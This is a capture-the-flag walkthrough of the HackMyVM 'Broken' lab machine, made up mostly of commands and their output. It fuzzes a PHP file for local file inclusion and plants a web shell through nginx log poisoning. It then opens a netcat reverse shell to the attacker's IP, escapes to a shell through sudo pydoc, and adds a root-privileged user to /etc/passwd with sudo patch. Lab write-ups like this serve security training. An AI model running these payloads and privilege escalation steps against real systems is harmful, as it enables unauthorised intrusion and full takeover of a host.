HackMyVm Broken Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Broken
Scan ports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
| 256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
|_ 256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
80/tcp open http nginx 1.14.2
| http-robots.txt: 1 disallowed entry
|_/textpattern
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).Scan port 80.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
...
/index.html (Status: 200) [Size: 3]
/file.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 23]robots.txt told us there is textpattern cms.
cat robots.txt
Disallow: /textpatternFuzz file.php for LFI.
wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discov
ery/Web-Content/big.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000007535: 200 27 L 40 W 1451 Ch "file" Check passwd.
curl 'http://broken/file.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
heart:x:1000:1000:heart,,,:/home/heart:/bin/bash...
Write shell code into nginx log file through agent string.
curl 'http://broken' -A '<?php system($_GET[c]); ?>'
:(Check if shell code works.
curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
...
192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)Try get reverse shell code.
curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'In another terminal, listen to port and get shell.
nc -nlvp 1234 fish-0 | 0 [20:49:51]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:50004.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Check sudo.
ww-data@broken:~/html/textpattern/textpattern$ sudo -l
sudo -l
Matching Defaults entries for www-data on broken:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on broken:
(heart) NOPASSWD: /usr/bin/pydoc3.7Run pydoc3.7 to get shell.
www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
...
:!/bin/sh
...
$ id
id
uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
$ pwd
pwd
/home/heart
$
Check sudo again.
heart@broken:~$ sudo -l
Matching Defaults entries for heart on broken:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User heart may run the following commands on broken:
(ALL) NOPASSWD: /usr/bin/patchUse patch to insert a new user root2 in /etc/passwd with root priviledge.
heart@broken:~$ cp /etc/passwd ./passwd_new
heart@broken:~$ openssl passwd mypass
qQdUCJYw6ARL6
heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
patching file /etc/passwd
heart@broken:~$ su root2
Password:
root@broken:/home/heart# id;hostname
uid=0(root) gid=0(root) groups=0(root)
broken
root@broken:/home/heart#